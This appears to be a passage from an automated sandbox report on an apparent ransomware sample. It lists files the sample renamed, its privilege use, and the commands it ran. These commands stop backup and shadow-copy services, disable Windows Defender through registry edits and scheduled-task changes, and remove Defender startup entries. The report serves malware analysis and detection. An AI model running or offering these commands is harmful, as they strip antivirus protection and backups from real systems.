| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_zh_CN.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_IAAAACAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\it-IT\rtscom.dll.mui | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata_5.5.0.165303.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AgAAAAIAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-io.xml.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AgAAAAIAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-compat.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_PAAAADwAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\de-DE\msadcor.dll.mui.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_MAAAADAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\fr-FR\iexplore.exe.mui.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_NAAAADQAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_zh_CN.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_NAAAADQAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\ja-JP\msader15.dll.mui.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_JgAAACYAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.filetransfer_5.0.0.v20140827-1444.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-dialogs_zh_CN.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-settings.xml.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_LAAAACwAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\es-ES\msadcer.dll.mui.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_GAAAABgAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\meta-index.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_PAAAADwAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.zh_CN_5.5.0.165303.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_ja.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.xml.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_MAAAADAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-dialogs_ja.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\an.txt.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_FAAAABQAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.ja_5.5.0.165303.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.commons.codec_1.6.0.v201305230611.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_JAAAACQAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\es-ES\msdaremr.dll.mui.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_PAAAADwAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder_5.5.0.165303.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfxswt.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp_5.5.0.165303.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.zh_CN_5.5.0.165303.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_OAAAADgAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.ja_5.5.0.165303.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_CgAAAAoAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_zh_4.4.0.v20140623020002.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_OAAAADgAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.properties.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\ja-JP\sqloledb.rll.mui | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf_1.1.0.v20140408-1354.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-options.xml.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_DgAAAA4AAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_zh_CN.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_BAAAAAQAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyclient.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyrun.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_AAAAAAAAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.update.configurator_3.3.300.v20140518-1928.jar.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_HAAAABwAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-queries.xml.DzORa30A8ppdk5MPifM7XuMmXYSkx1n0xcL1y7DNPVL_KgAAACoAAAA0.4g3j7 | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe
"C:\Users\Admin\AppData\Local\Temp\89a9279a31e78ceb036d8be5b2e3c7aeb1021a05cff7bbd5e5025250c911234b.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_15e3c" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_15e3c" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_15e3c" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
